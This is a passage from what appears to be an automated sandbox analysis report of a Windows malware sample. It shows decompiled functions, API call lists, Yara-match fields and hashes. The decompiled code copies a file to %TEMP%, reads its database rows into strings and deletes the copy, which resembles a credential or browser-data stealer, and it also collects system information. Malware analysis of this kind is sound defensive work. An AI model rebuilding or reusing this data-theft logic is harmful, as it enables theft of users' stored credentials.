                                                                                                                                                                                              				char _v76;
                                                                                                                                                                                              				char _v80;
                                                                                                                                                                                              				WCHAR* _t76;
                                                                                                                                                                                              				intOrPtr* _t91;
                                                                                                                                                                                              				void* _t93;
                                                                                                                                                                                              				intOrPtr* _t95;
                                                                                                                                                                                              				intOrPtr* _t99;
                                                                                                                                                                                              				intOrPtr* _t132;
                                                                                                                                                                                              				void* _t134;
                                                                                                                                                                                              				intOrPtr* _t136;
                                                                                                                                                                                              				void* _t138;
                                                                                                                                                                                              				intOrPtr* _t140;
                                                                                                                                                                                              				intOrPtr* _t146;
                                                                                                                                                                                              				void* _t148;
                                                                                                                                                                                              				void* _t154;
                                                                                                                                                                                              				intOrPtr _t174;
                                                                                                                                                                                              				intOrPtr _t176;
                                                                                                                                                                                              				intOrPtr _t183;
                                                                                                                                                                                              				intOrPtr _t187;
                                                                                                                                                                                              				intOrPtr _t188;
                                                                                                                                                                                              				void* _t189;
                                                                                                                                                                                              				void* _t190;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t185 = __esi;
                                                                                                                                                                                              				_t153 = __ebx;
                                                                                                                                                                                              				_t187 = _t188;
                                                                                                                                                                                              				_t154 = 9;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t154 = _t154 - 1;
                                                                                                                                                                                              					_t192 = _t154;
                                                                                                                                                                                              				} while (_t154 != 0);
                                                                                                                                                                                              				_push(_t154);
                                                                                                                                                                                              				_push(__ebx);
                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                              				_push(__edi);
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_v8 = __eax;
                                                                                                                                                                                              				E004040F4( &_v8);
                                                                                                                                                                                              				_push(_t187);
                                                                                                                                                                                              				_push(0x410b63);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t188;
                                                                                                                                                                                              				E004034E4( &_v28);
                                                                                                                                                                                              				_push(_t187);
                                                                                                                                                                                              				_push(0x410ae8);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t188;
                                                                                                                                                                                              				E00406FDC(GetTickCount(), __ebx,  &_v48, __esi, _t192);
                                                                                                                                                                                              				_push(_v48);
                                                                                                                                                                                              				E00406F1C( &_v52, __ebx, __edi, __esi, _t192);
                                                                                                                                                                                              				_push(_v52);
                                                                                                                                                                                              				_push(L".tmp");
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040781C(_v8, _t153,  &_v40, _t192);
                                                                                                                                                                                              				E004062D8(L"%TEMP%",  &_v60, _t192);
                                                                                                                                                                                              				_push(_v60);
                                                                                                                                                                                              				_push(0x410b9c);
                                                                                                                                                                                              				_push(_v32);
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040781C(_v56, _t153,  &_v44, _t192);
                                                                                                                                                                                              				_t76 = E00403D3C(_v44);
                                                                                                                                                                                              				CopyFileW(E00403D3C(_v40), _t76, 0xffffffff);
                                                                                                                                                                                              				E0040377C( &_v64, _v44);
                                                                                                                                                                                              				E00404AFC(_v64, _t153, _t154,  &_v36, _t185, _t192);
                                                                                                                                                                                              				E00403D2C( &_v68, _v36);
                                                                                                                                                                                              				if(E004076B0(_v68, _t153, _t154) != 0) {
                                                                                                                                                                                              					_t91 =  *0x41b55c; // 0x41c784
                                                                                                                                                                                              					_t93 =  *((intOrPtr*)( *_t91))(E00403990(_v36),  &_v16);
                                                                                                                                                                                              					_t189 = _t188 + 8;
                                                                                                                                                                                              					__eflags = _t93;
                                                                                                                                                                                              					if(_t93 == 0) {
                                                                                                                                                                                              						E00408120(0x11,  &_v72);
                                                                                                                                                                                              						_t132 =  *0x41b5cc; // 0x41c78c
                                                                                                                                                                                              						_t134 =  *((intOrPtr*)( *_t132))(_v16, E00403990(_v72), 0xffffffff,  &_v20,  &_v24);
                                                                                                                                                                                              						_t190 = _t189 + 0x14;
                                                                                                                                                                                              						__eflags = _t134;
                                                                                                                                                                                              						if(_t134 == 0) {
                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                              								_t136 =  *0x41b600; // 0x41c790
                                                                                                                                                                                              								_t138 =  *((intOrPtr*)( *_t136))(_v20);
                                                                                                                                                                                              								__eflags = _t138 - 0x64;
                                                                                                                                                                                              								if(_t138 != 0x64) {
                                                                                                                                                                                              									goto L9;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t140 =  *0x41b588; // 0x41c794
                                                                                                                                                                                              								E004036DC( &_v76,  *((intOrPtr*)( *_t140))(_v20, 0, _v28));
                                                                                                                                                                                              								_t146 =  *0x41b588; // 0x41c794
                                                                                                                                                                                              								_t148 =  *((intOrPtr*)( *_t146))(_v20, 1, 0x410ba8, _v76);
                                                                                                                                                                                              								_t190 = _t190 + 0x10;
                                                                                                                                                                                              								E004036DC( &_v80, _t148);
                                                                                                                                                                                              								_push(_v80);
                                                                                                                                                                                              								_push(E00410BB4);
                                                                                                                                                                                              								E00403850();
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L9:
                                                                                                                                                                                              					_t95 =  *0x41b654; // 0x41c79c
                                                                                                                                                                                              					 *((intOrPtr*)( *_t95))(_v20);
                                                                                                                                                                                              					_t99 =  *0x41b590; // 0x41c788
                                                                                                                                                                                              					 *((intOrPtr*)( *_t99))(_v16);
                                                                                                                                                                                              					_pop(_t174);
                                                                                                                                                                                              					 *[fs:eax] = _t174;
                                                                                                                                                                                              					E00403D2C(_v12, _v28);
                                                                                                                                                                                              					DeleteFileW(E00403D3C(_v44));
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_pop(_t183);
                                                                                                                                                                                              					 *[fs:eax] = _t183;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_pop(_t176);
                                                                                                                                                                                              				 *[fs:eax] = _t176;
                                                                                                                                                                                              				_push(E00410B6A);
                                                                                                                                                                                              				E00403508( &_v80, 3);
                                                                                                                                                                                              				E00403B80( &_v68);
                                                                                                                                                                                              				E004034E4( &_v64);
                                                                                                                                                                                              				E00403B98( &_v60, 6);
                                                                                                                                                                                              				E004034E4( &_v36);
                                                                                                                                                                                              				E00403B80( &_v32);
                                                                                                                                                                                              				E004034E4( &_v28);
                                                                                                                                                                                              				return E00403B80( &_v8);
                                                                                                                                                                                              			}

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00410945
                                                                                                                                                                                              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410B9C,?,.tmp,?,?,00000000,00410AE8,?,00000000,00410B63,?,00000000), ref: 004109C1
                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 00410B06
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CopyCountDeleteTick
                                                                                                                                                                                              • String ID: %TEMP%$.tmp
                                                                                                                                                                                              • API String ID: 2381671008-3650661790
                                                                                                                                                                                              • Opcode ID: b6365babbb2d3b2e1b37703ec200a2ec6b79da26c3864396c2c11ec0f131d7bb
                                                                                                                                                                                              • Instruction ID: 1e08b77d5c93ddd244bb37ca777f3c967e0d5c0e96542229b92685f54af29c93
                                                                                                                                                                                              • Opcode Fuzzy Hash: b6365babbb2d3b2e1b37703ec200a2ec6b79da26c3864396c2c11ec0f131d7bb
                                                                                                                                                                                              • Instruction Fuzzy Hash: DA710B71A04109AFDB00EF95DC41EDEBBB9EF48318F104476F514F72A2DA78AE458B58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 65%
                                                                                                                                                                                              			E00402AC4() {
                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				int _v16;
                                                                                                                                                                                              				signed short _t12;
                                                                                                                                                                                              				signed short _t14;
                                                                                                                                                                                              				intOrPtr _t27;
                                                                                                                                                                                              				void* _t29;
                                                                                                                                                                                              				void* _t31;
                                                                                                                                                                                              				intOrPtr _t32;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t29 = _t31;
                                                                                                                                                                                              				_t32 = _t31 + 0xfffffff4;
                                                                                                                                                                                              				_v12 =  *0x41b018 & 0x0000ffff;
                                                                                                                                                                                              				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                                                                                                                                                                                              					_t12 =  *0x41b018; // 0x1332
                                                                                                                                                                                              					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
                                                                                                                                                                                              					 *0x41b018 = _t14;
                                                                                                                                                                                              					return _t14;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_push(_t29);
                                                                                                                                                                                              					_push(E00402B35);
                                                                                                                                                                                              					_push( *[fs:eax]);
                                                                                                                                                                                              					 *[fs:eax] = _t32;
                                                                                                                                                                                              					_v16 = 4;
                                                                                                                                                                                              					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                                                                                                                                                                                              					_pop(_t27);
                                                                                                                                                                                              					 *[fs:eax] = _t27;
                                                                                                                                                                                              					_push(0x402b3c);
                                                                                                                                                                                              					return RegCloseKey(_v8);
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}













                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                              • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                                                              • API String ID: 3677997916-4173385793
                                                                                                                                                                                              • Opcode ID: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
                                                                                                                                                                                              • Instruction ID: 9172d05214030136d6eeabac91fa7c92d03713ed8c8260d1a9efe939ba63eb8f
                                                                                                                                                                                              • Opcode Fuzzy Hash: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 04019275500308B9DB21AF908D46FAA7BB8D708700F600076BA04F66D0E7B8AA10979C
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 66%
                                                                                                                                                                                              			E00416584(void* __eax, void* __ebx, void* __esi, void* __eflags) {
                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                                                              				char _v68;
                                                                                                                                                                                              				char _v72;
                                                                                                                                                                                              				_Unknown_base(*)()* _t13;
                                                                                                                                                                                              				intOrPtr _t36;
                                                                                                                                                                                              				void* _t38;
                                                                                                                                                                                              				void* _t39;
                                                                                                                                                                                              				void* _t41;
                                                                                                                                                                                              				void* _t43;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t43 = __eflags;
                                                                                                                                                                                              				_v72 = 0;
                                                                                                                                                                                              				_t38 = __eax;
                                                                                                                                                                                              				 *[fs:eax] = _t41 + 0xffffffbc;
                                                                                                                                                                                              				_t13 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
                                                                                                                                                                                              				E004028E0( &_v68, 0x40);
                                                                                                                                                                                              				_v68 = 0x40;
                                                                                                                                                                                              				 *_t13( &_v68,  *[fs:eax], 0x41660e, _t41, __esi, __ebx, _t39);
                                                                                                                                                                                              				E00406FDC(E00404570(_v60, _v56, 0x100000, 0), _t13,  &_v72, _t38, _t43);
                                                                                                                                                                                              				E0040377C(_t38, _v72);
                                                                                                                                                                                              				_pop(_t36);
                                                                                                                                                                                              				 *[fs:eax] = _t36;
                                                                                                                                                                                              				_push(E00416615);
                                                                                                                                                                                              				return E00403B80( &_v72);
                                                                                                                                                                                              			}














                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,00000000,0041660E,?,0041B0FC,?), ref: 004165AB
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004165B1
                                                                                                                                                                                                • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressFreeLibraryLoadProcString
                                                                                                                                                                                              • String ID: @$GlobalMemoryStatusEx$kernel32.dll
                                                                                                                                                                                              • API String ID: 923276998-3878206809
                                                                                                                                                                                              • Opcode ID: 85db832d693e486d1a61cee5b690b9a662077cbaa7453f9a7cd2e2dd296e1093
                                                                                                                                                                                              • Instruction ID: ae4c68d41a3a4174a937c26ab83d8f0c6d254553f6270358502c1b43c0ddce29
                                                                                                                                                                                              • Opcode Fuzzy Hash: 85db832d693e486d1a61cee5b690b9a662077cbaa7453f9a7cd2e2dd296e1093
                                                                                                                                                                                              • Instruction Fuzzy Hash: A3018871A002086BD711EBA5DC42E8EB7BDEB88744F61413AF504B32D1E77CAD01855C
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 33%
                                                                                                                                                                                              			E00406654(void* __ecx) {
                                                                                                                                                                                              				signed char _t3;
                                                                                                                                                                                              				signed char _t7;
                                                                                                                                                                                              				intOrPtr* _t8;
                                                                                                                                                                                              				signed char* _t11;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t8 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
                                                                                                                                                                                              				_t3 = 0;
                                                                                                                                                                                              				 *_t11 = 0;
                                                                                                                                                                                              				if(_t8 != 0) {
                                                                                                                                                                                              					_push(_t11);
                                                                                                                                                                                              					_push(GetCurrentProcess());
                                                                                                                                                                                              					if( *_t8() == 0 ||  *_t11 == 0) {
                                                                                                                                                                                              						_t7 = 0;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t7 = 1;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t3 =  ~_t7;
                                                                                                                                                                                              					asm("sbb eax, eax");
                                                                                                                                                                                              					 *_t11 = _t3;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				asm("sbb eax, eax");
                                                                                                                                                                                              				return _t3 + 1;
                                                                                                                                                                                              			}








                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,?,?,004066D4,?,00417330,00000000,004175F4,?,Windows : ,?,,?,EXE_PATH : ,?), ref: 00406660
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00406666
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,kernel32.dll,IsWow64Process,?,?,004066D4,?,00417330,00000000,004175F4,?,Windows : ,?,,?), ref: 00406677
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                                                                                                              • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                              • API String ID: 4190356694-3024904723
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E00410E58(signed int __eax, void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                              				char _v40;
                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                              				char _v56;
                                                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                                                              				char _v64;
                                                                                                                                                                                              				char _v68;
                                                                                                                                                                                              				char _v72;
                                                                                                                                                                                              				char _v76;
                                                                                                                                                                                              				char _v80;
                                                                                                                                                                                              				char _v84;
                                                                                                                                                                                              				char _v88;
                                                                                                                                                                                              				char _v92;
                                                                                                                                                                                              				intOrPtr _v117;
                                                                                                                                                                                              				signed int _t70;
                                                                                                                                                                                              				signed int _t71;
                                                                                                                                                                                              				WCHAR* _t91;
                                                                                                                                                                                              				intOrPtr* _t106;
                                                                                                                                                                                              				intOrPtr _t108;
                                                                                                                                                                                              				intOrPtr* _t110;
                                                                                                                                                                                              				intOrPtr* _t114;
                                                                                                                                                                                              				intOrPtr* _t151;
                                                                                                                                                                                              				intOrPtr _t153;
                                                                                                                                                                                              				intOrPtr* _t155;
                                                                                                                                                                                              				void* _t157;
                                                                                                                                                                                              				intOrPtr* _t159;
                                                                                                                                                                                              				intOrPtr* _t163;
                                                                                                                                                                                              				void* _t165;
                                                                                                                                                                                              				intOrPtr* _t170;
                                                                                                                                                                                              				intOrPtr* _t176;
                                                                                                                                                                                              				intOrPtr* _t182;
                                                                                                                                                                                              				void* _t184;
                                                                                                                                                                                              				intOrPtr* _t188;
                                                                                                                                                                                              				void* _t192;
                                                                                                                                                                                              				intOrPtr _t213;
                                                                                                                                                                                              				intOrPtr _t215;
                                                                                                                                                                                              				void* _t221;
                                                                                                                                                                                              				intOrPtr _t227;
                                                                                                                                                                                              				intOrPtr _t231;
                                                                                                                                                                                              				intOrPtr _t232;
                                                                                                                                                                                              				void* _t233;
                                                                                                                                                                                              				void* _t234;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t229 = __esi;
                                                                                                                                                                                              				_t190 = __ebx;
                                                                                                                                                                                              				_pop(_t232);
                                                                                                                                                                                              				 *__eax =  *__eax + __eax;
                                                                                                                                                                                              				 *((intOrPtr*)(__edx)) =  *((intOrPtr*)(__edx)) + __eax;
                                                                                                                                                                                              				 *__eax =  *__eax + __eax;
                                                                                                                                                                                              				 *__ecx =  *__ecx + __ecx;
                                                                                                                                                                                              				 *__eax =  *__eax | __eax;
                                                                                                                                                                                              				 *__eax =  *__eax + __eax;
                                                                                                                                                                                              				_t70 = __eax;
                                                                                                                                                                                              				 *_t70 =  *_t70 + _t70;
                                                                                                                                                                                              				_t71 = _t70 | 0x00000a00;
                                                                                                                                                                                              				 *_t71 =  *_t71 + _t71;
                                                                                                                                                                                              				_v117 = _v117 + __edx;
                                                                                                                                                                                              				_t231 = _t232;
                                                                                                                                                                                              				_t192 = 0xb;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t192 = _t192 - 1;
                                                                                                                                                                                              					_t242 = _t192;
                                                                                                                                                                                              				} while (_t192 != 0);
                                                                                                                                                                                              				_push(__ebx);
                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                              				_push(__edi);
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_v8 = _t71;
                                                                                                                                                                                              				E004040F4( &_v8);
                                                                                                                                                                                              				_push(_t231);
                                                                                                                                                                                              				_push(0x411163);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t232;
                                                                                                                                                                                              				E00403B80( &_v28);
                                                                                                                                                                                              				_push(_t231);
                                                                                                                                                                                              				_push(0x4110ce);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t232;
                                                                                                                                                                                              				E00406FDC(GetTickCount(), __ebx,  &_v52, __esi, _t242);
                                                                                                                                                                                              				_push(_v52);
                                                                                                                                                                                              				E00406F1C( &_v56, __ebx, __edi, __esi, _t242);
                                                                                                                                                                                              				_push(_v56);
                                                                                                                                                                                              				_push(L".tmp");
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040781C(_v8, _t190,  &_v40, _t242);
                                                                                                                                                                                              				E004062D8(L"%TEMP%",  &_v64, _t242);
                                                                                                                                                                                              				_push(_v64);
                                                                                                                                                                                              				_push(0x41119c);
                                                                                                                                                                                              				_push(_v32);
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040781C(_v60, _t190,  &_v44, _t242);
                                                                                                                                                                                              				_t91 = E00403D3C(_v44);
                                                                                                                                                                                              				CopyFileW(E00403D3C(_v40), _t91, 0xffffffff);
                                                                                                                                                                                              				E0040377C( &_v68, _v44);
                                                                                                                                                                                              				E00404AFC(_v68, _t190, _t192,  &_v36, _t229, _t242);
                                                                                                                                                                                              				E00403D2C( &_v72, _v36);
                                                                                                                                                                                              				if(E004076B0(_v72, _t190, _t192) != 0) {
                                                                                                                                                                                              					_t106 =  *0x41b55c; // 0x41c784
                                                                                                                                                                                              					_t108 =  *((intOrPtr*)( *_t106))(E00403990(_v36),  &_v16);
                                                                                                                                                                                              					_t233 = _t232 + 8;
                                                                                                                                                                                              					__eflags = _t108;
                                                                                                                                                                                              					if(_t108 == 0) {
                                                                                                                                                                                              						E00408120(0x66,  &_v76);
                                                                                                                                                                                              						_t151 =  *0x41b5cc; // 0x41c78c
                                                                                                                                                                                              						_t153 =  *((intOrPtr*)( *_t151))(_v16, E00403990(_v76), 0xffffffff,  &_v20,  &_v24);
                                                                                                                                                                                              						_t234 = _t233 + 0x14;
                                                                                                                                                                                              						__eflags = _t153;
                                                                                                                                                                                              						if(_t153 == 0) {
                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                              								_t155 =  *0x41b600; // 0x41c790
                                                                                                                                                                                              								_t157 =  *((intOrPtr*)( *_t155))(_v20);
                                                                                                                                                                                              								__eflags = _t157 - 0x64;
                                                                                                                                                                                              								if(_t157 != 0x64) {
                                                                                                                                                                                              									goto L12;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t159 =  *0x41b644; // 0x41c798
                                                                                                                                                                                              								_t163 =  *0x41b588; // 0x41c794
                                                                                                                                                                                              								_t165 =  *((intOrPtr*)( *_t163))(_v20, 3,  *((intOrPtr*)( *_t159))(_v20, 3));
                                                                                                                                                                                              								_pop(_t221);
                                                                                                                                                                                              								E004094C4(_t165,  &_v48, _t221);
                                                                                                                                                                                              								E00403D2C( &_v80, _v48);
                                                                                                                                                                                              								_t170 =  *0x41b588; // 0x41c794
                                                                                                                                                                                              								E00403C98( &_v84,  *((intOrPtr*)( *_t170))(_v20, 0, 0x4111a4, _v80, _v28));
                                                                                                                                                                                              								_t176 =  *0x41b588; // 0x41c794
                                                                                                                                                                                              								E00403C98( &_v88,  *((intOrPtr*)( *_t176))(_v20, 1, 0x4111a4, _v84));
                                                                                                                                                                                              								_t182 =  *0x41b588; // 0x41c794
                                                                                                                                                                                              								_t184 =  *((intOrPtr*)( *_t182))(_v20, 2, 0x4111b0, _v88);
                                                                                                                                                                                              								_t234 = _t234 + 0x28;
                                                                                                                                                                                              								E00403C98( &_v92, _t184);
                                                                                                                                                                                              								_push(_v92);
                                                                                                                                                                                              								_push(L"\r\n\r\n");
                                                                                                                                                                                              								E00403E1C();
                                                                                                                                                                                              								_t188 =  *0x41b584; // 0x41b0b4
                                                                                                                                                                                              								 *_t188 =  *_t188 + 1;
                                                                                                                                                                                              								__eflags =  *_t188;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L12:
                                                                                                                                                                                              					_t110 =  *0x41b654; // 0x41c79c
                                                                                                                                                                                              					 *((intOrPtr*)( *_t110))(_v20);
                                                                                                                                                                                              					_t114 =  *0x41b590; // 0x41c788
                                                                                                                                                                                              					 *((intOrPtr*)( *_t114))(_v16);
                                                                                                                                                                                              					_pop(_t213);
                                                                                                                                                                                              					 *[fs:eax] = _t213;
                                                                                                                                                                                              					E00403BBC(_v12, _v28);
                                                                                                                                                                                              					DeleteFileW(E00403D3C(_v44));
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_pop(_t227);
                                                                                                                                                                                              					 *[fs:eax] = _t227;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_pop(_t215);
                                                                                                                                                                                              				 *[fs:eax] = _t215;
                                                                                                                                                                                              				_push(E0041116A);
                                                                                                                                                                                              				E00403B98( &_v92, 4);
                                                                                                                                                                                              				E004034E4( &_v76);
                                                                                                                                                                                              				E00403B80( &_v72);
                                                                                                                                                                                              				E004034E4( &_v68);
                                                                                                                                                                                              				E00403B98( &_v64, 4);
                                                                                                                                                                                              				E004034E4( &_v48);
                                                                                                                                                                                              				E00403B98( &_v44, 2);
                                                                                                                                                                                              				E004034E4( &_v36);
                                                                                                                                                                                              				E00403B98( &_v32, 2);
                                                                                                                                                                                              				return E00403B80( &_v8);
                                                                                                                                                                                              			}


                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00410EB4
                                                                                                                                                                                              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CopyCountFileTick
                                                                                                                                                                                              • String ID: %TEMP%$.tmp
                                                                                                                                                                                              • API String ID: 3448371392-3650661790
                                                                                                                                                                                              • Opcode ID: dcbd54fc4c37fa41d1f3def047f476980ec269fdbcef2be5238ae35c760609eb
                                                                                                                                                                                              • Instruction ID: 0e4f139da3bc19c2096e57fedbffea1b6a0c7ee0d64fc6893e7b5a554fe936bc
                                                                                                                                                                                              • Opcode Fuzzy Hash: dcbd54fc4c37fa41d1f3def047f476980ec269fdbcef2be5238ae35c760609eb
                                                                                                                                                                                              • Instruction Fuzzy Hash: D0411F31904249AEDB01EBA1D852ACDBF79EF49308F50447BF500B76A3D67CAE458A58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E00410E60(signed int __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                              				char _v40;
                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                              				char _v56;
                                                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                                                              				char _v64;
                                                                                                                                                                                              				char _v68;
                                                                                                                                                                                              				char _v72;
                                                                                                                                                                                              				char _v76;
                                                                                                                                                                                              				char _v80;
                                                                                                                                                                                              				char _v84;
                                                                                                                                                                                              				char _v88;
                                                                                                                                                                                              				char _v92;
                                                                                                                                                                                              				intOrPtr _v117;
                                                                                                                                                                                              				signed int _t70;
                                                                                                                                                                                              				signed int _t71;
                                                                                                                                                                                              				WCHAR* _t91;
                                                                                                                                                                                              				intOrPtr* _t106;
                                                                                                                                                                                              				intOrPtr _t108;
                                                                                                                                                                                              				intOrPtr* _t110;
                                                                                                                                                                                              				intOrPtr* _t114;
                                                                                                                                                                                              				intOrPtr* _t151;
                                                                                                                                                                                              				intOrPtr _t153;
                                                                                                                                                                                              				intOrPtr* _t155;
                                                                                                                                                                                              				void* _t157;
                                                                                                                                                                                              				intOrPtr* _t159;
                                                                                                                                                                                              				intOrPtr* _t163;
                                                                                                                                                                                              				void* _t165;
                                                                                                                                                                                              				intOrPtr* _t170;
                                                                                                                                                                                              				intOrPtr* _t176;
                                                                                                                                                                                              				intOrPtr* _t182;
                                                                                                                                                                                              				void* _t184;
                                                                                                                                                                                              				intOrPtr* _t188;
                                                                                                                                                                                              				void* _t191;
                                                                                                                                                                                              				intOrPtr _t212;
                                                                                                                                                                                              				intOrPtr _t214;
                                                                                                                                                                                              				void* _t220;
                                                                                                                                                                                              				intOrPtr _t226;
